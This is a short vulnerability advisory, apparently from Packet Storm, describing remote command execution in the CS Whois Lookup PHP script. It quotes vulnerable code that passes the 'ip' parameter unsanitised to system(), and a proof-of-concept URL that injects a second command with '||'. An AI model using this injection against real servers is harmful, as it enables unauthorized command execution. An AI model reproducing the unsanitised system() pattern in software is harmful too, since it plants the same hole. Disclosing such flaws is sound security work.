CS Whois Lookup suffers from a remote command execution vulnerability in index.php.
85a82a260d71448b516e0cab898dbdf66739903983631f543b84512a1802dc19##########################################################################################
[+] CS Whois Lookup (index.php ip) Remote Command Execution Vulnerability
[+] Discovered By SirGod
[+] www.mortal-team.net
[+] www.h4cky0u.org
##########################################################################################
[+] Download : http://www.hotscripts.com/listings/jump/download/84580/
[+] Remote Command Execution
Vulnerable code in index.php
-----------------------------------------
if ( isset($_GET['ip']) ) {
$ip=$_GET['ip'];
print system("/usr/bin/whois $ip");
------------------------------------------
PoC :
http://127.0.0.1/[path]/index.php?ip=||COMMAND HERE
Example :
http://127.0.0.1/path/index.php?ip=||whoami
##########################################################################################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed